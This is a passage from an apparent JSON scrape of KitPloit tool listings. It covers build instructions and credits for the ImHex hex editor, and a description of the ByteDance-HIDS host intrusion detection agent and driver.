Moreover, the following dependencies are needed for compiling ImHex: \n\n * GLFW3 \n * libmagic, libgnurx, libtre, libintl, libiconv \n * libcrypto \n * capstone \n * nlohmann json \n * Python3 \n * freetype2 \n * Brew (macOS only) \n \n** Windows and Linux ** \n\n\nFind all-in-one dependency installation scripts for Arch Linux, Fedora, Debian/Ubuntu and/or MSYS2 in [ dist ](<https://github.com/WerWolv/ImHex/blob/master/dist> \"dist\" ) . \n\nAfter all the dependencies are installed, run the following commands to build ImHex: \n \n \n mkdir build \n cd build \n cmake -DCMAKE_BUILD_TYPE=Release .. \n make -j\n\n \n\n\nTo create a standalone zipfile on Windows, get the Python standard [ library ](<https://www.kitploit.com/search/label/Library> \"library\" ) (e.g. from [ https://github.com/python/cpython/tree/master/Lib ](<https://github.com/python/cpython/tree/master/Lib> \"https://github.com/python/cpython/tree/master/Lib\" ) ) and place the files and folders in ` lib/python3.8 ` next to your built executable. Don't forget to also copy the ` libpython3.8.dll ` and ` libwinpthread-1.dll ` from your mingw setup next to the executable. \n\nOn both Windows and Linux: \n\n * Copy the files from ` python_libs ` in the ` lib ` folder next to your built executable. \n * Place your magic databases in the ` magic ` folder next to your built executable \n * Place your patterns in the ` pattern ` folder next to your built executable \n * Place your include pattern files in the ` include ` folder next to your built executable \n \n** macOS ** \n\n\nTo build ImHex on macOS, run the following commands: \n \n \n brew bundle --no-lock --file dist/Brewfile \n mkdir build \n cd build \n CC=$(brew --prefix llvm)/bin/clang CXX=$(brew --prefix llvm)/bin/clang++ PKG_CONFIG_PATH=\"$(brew --prefix openssl)/lib/pkgconfig\":\"$(brew --prefix)/lib/pkgconfig\" cmake -DCMAKE_BUILD_TYPE=Release .. 
\n make -j\n\n \n** Credits ** \n\n\n * Thanks a lot to ocornut for their amazing [ Dear ImGui ](<https://github.com/ocornut/imgui> \"Dear ImGui\" ) which is used for building the entire interface \n * Thanks to ocornut as well for their hex editor view used as base for this project. \n * Thanks to BalazsJako for their incredible [ ImGuiColorTextEdit ](<https://github.com/BalazsJako/ImGuiColorTextEdit> \"ImGuiColorTextEdit\" ) used for the pattern language syntax highlighting \n * Thanks to AirGuanZ for their amazing [ imgui-filebrowser ](<https://github.com/AirGuanZ/imgui-filebrowser> \"imgui-filebrowser\" ) used for loading and saving files \n * Thanks to nlohmann for their [ json ](<https://github.com/nlohmann/json> \"json\" ) library used for project files \n * Thanks to aquynh for [ capstone ](<https://github.com/aquynh/capstone> \"capstone\" ) which is the base of the disassembly window \n \n \n\n\n** [ Download ImHex ](<https://github.com/WerWolv/ImHex> \"Download ImHex\" ) **\n", "edition": 1, "modified": "2021-01-17T20:30:00", "published": "2021-01-17T20:30:00", "id": "KITPLOIT:1589614983163960020", "href": "http://www.kitploit.com/2021/01/imhex-hex-editor-for-reverse-engineers.html", "title": "ImHex - A Hex Editor For Reverse Engineers, Programmers And People That Value Their Eye Sight When Working At 3 AM.", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-16T15:30:07", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-zY6QCj9gbqc/X_u0kkN1JBI/AAAAAAAAU-E/3ge7NXefDLA1PbdSfYw1fKXiPkCvFnbdgCNcBGAsYHQ/s2616/ByteDance-HIDS_1_ByteDance-HIDS.png>)\n\n \n\n\nByteDance-HIDS is a Cloud-Native Host-Based [ Intrusion Detection ](<https://www.kitploit.com/search/label/Intrusion%20Detection> \"Intrusion Detection\" ) solution project to provide next-generation [ Threat Detection ](<https://www.kitploit.com/search/label/Threat%20Detection> \"Threat Detection\" ) and Behavior Audition with 
modern architecture. \n\nByteDance-HIDS comprises three major components: \n\n * ** ByteDance-HIDS Agent, co-worked with ByteDance-HIDS Driver ** , is the game-changer for the Data Collection market. It works at both Kernel and User Space of Linux System, providing rich data flow with much better performance. \n * ** ByteDance-HIDS Server ** provides Service-Discovery for the production environment of up to millions of agents. The Server also supports primary data formatting along with rules distribution for the Agent. \n * ** ByteDance-HIDS HUB ** provides high-performance, lightweight, and stateless alert generation with data [ manipulation ](<https://www.kitploit.com/search/label/Manipulation> \"manipulation\" ) to analyze the rich data flow. \n\n \n\n\nNow we are more than happy to announce the open-sourcing of ByteDance-HIDS Agent and ByteDance-HIDS Driver. We decided to strengthen the Defense Community with our game-changing technology. Due to the lack of a rule engine and detection functions, ByteDance-HIDS Agent and Driver don't provide all HIDS capability on their own. However, it is a tremendous Host-Information-Collect-Agent that could be easily integrated with current HIDS/NIDS/XDR solutions on the market. ByteDance-HIDS Agent and ByteDance-HIDS Driver together advance solutions on the market in four major areas. \n\n * ** Better performance ** Data/Information are collected in kernel space to avoid additional supplement actions such as traversal of '/proc' directory or collecting from other audition processes such as \"auditd\". \n * ** Hard to be bypassed ** A specifically designed kernel driver powers data/Information collection, making it virtually impossible for malicious software, like rootkit, to evade detection or audition. The Driver could capture even evasion behavior itself. \n * ** Kernel + User Space ** ByteDance-HIDS Agent provides User Space detection abilities, including file audition, in-house rule detection, and primary allowlists. 
\n * ** Easy to be integrated ** ByteDance-HIDS could empower any User Space agents far beyond Host Intrusion usages with the detailed and reliable data flow. A wide user action audition could benefit both Behavior [ Analysis ](<https://www.kitploit.com/search/label/Analysis> \"Analysis\" ) and [ Compliance ](<https://www.kitploit.com/search/label/Compliance> \"Compliance\" ) requests. When integrated with NIDS, security analyzers could build a comprehensive Provenance Graph from the network connections, along with high traceable process trees and file auditions. \n \n** System Architecture ** \n\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-PuYlMezQACA/X_u0svjR4GI/AAAAAAAAU-I/YUrl3OvzCxkaIe_3utOJhSG8rPFkMw__gCNcBGAsYHQ/s2616/ByteDance-HIDS_1_ByteDance-HIDS.png>)\n\n \n\n\nCurrently, we are only open-sourcing ByteDance-HIDS Agent && Driver. Both components have been deployed and tested in production environments for months. We welcome any suggestions and cooperation. \n\n * ** [ ByteDance-HIDS Driver ](<https://github.com/bytedance/ByteDance-HIDS/tree/main/driver> \"ByteDance-HIDS Driver\" ) ** \n\n * ** [ ByteDance-HIDS Agent ](<https://github.com/bytedance/ByteDance-HIDS/tree/main/agent> \"ByteDance-HIDS Agent\" ) ** \n\n \n** To be Continued ** \n\n\n * ByteDance-Server is under development. More Features are on the way. \n \n \n\n\n** [ Download ByteDance-HIDS ](<https://github.com/bytedance/ByteDance-HIDS> \"Download ByteDance-HIDS\" ) **\n", "edition": 1, "modified": "2021-01-16T11:30:06", "published": "2021-01-16T11:30:06", "id": "KITPLOIT:8692887888107645706", "href": "http://www.kitploit.com/2021/01/bytedance-hids-cloud-native-host-based.html", "title": "ByteDance-HIDS - A Cloud-Native Host-Based Intrusion Detection Solution Project To Provide Next-Generation Threat Detection And Behavior Audition With Modern Architecture", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}]}